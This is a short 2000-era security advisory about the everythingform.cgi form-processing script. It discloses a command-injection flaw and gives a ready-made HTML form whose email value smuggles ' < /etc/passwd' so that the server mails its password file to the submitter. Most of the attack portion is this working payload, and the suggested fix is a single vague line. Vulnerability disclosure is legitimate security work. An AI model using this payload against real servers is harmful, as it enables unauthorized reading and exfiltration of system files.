everythingform.txt

`Content-Type: Remote Root via vulnerible CGI software  
Date : 13/08/2000  
Sender : s1gnal_9 <[email protected]>  
Subject : everythingform.cgi Vulnerible CGI  
X-System : UNIX/NT systems running the everythingform.cgi CGI software  
X-Status : s1gnal_9-ADVISORY-everythingform.txt  
X-Greets : Narr0w, f0bic, VetesGirl  
_________________________________________________________________________________  
  
  
PRODUCT NAME: The EVERYTHING form [everythingform.cgi]  
  
PRODUCT HOMEPAGE: http://www.conservatives.net/atheist/scripts/index.html?everythingform  
  
  
DESCRIPTION :   
It allows you to process an unlimited number of forms   
using only one script; its feature's are simple, and flexible according the   
the product homepage.  
This is the replacement script for the previous scripts "flexform" and "flexform_mail".  
  
PROBLEM:  
When you submit the form, it responds back to the email address that you entered, saying   
"thank you" or other data, when you put your email address in the form add " < /etc/passwd"  
after your email address, and shortly you will have the /etc/passwd file in your mailbox.  
  
  
EXAMPLE:  
Below is a example of how we could get the /etc/passwd file off the remote system.  
  
<-------------------------CUT HERE-------------------------------------->  
<form action=http://www.SOMESERVER.com/everythingform.cgi method=POST>  
<input type=hidden name=redirect value=done.html>  
<input type=hidden name=output value=blah.htm>  
<input type=hidden name=required value="Name|e-mail">  
E-mail: <input type=text name="e-mail" value="[email protected] < /etc/passwd"><br>  
<input type=submit value="Click me to get /etc/passwd"></form>  
<-------------------------CUT HERE-------------------------------------->  
  
  
SOLUTION  
I would rewrite a portion of the script to do input validation checking.  
  
  
Please visit www.zone.ee/unix :)  
  
`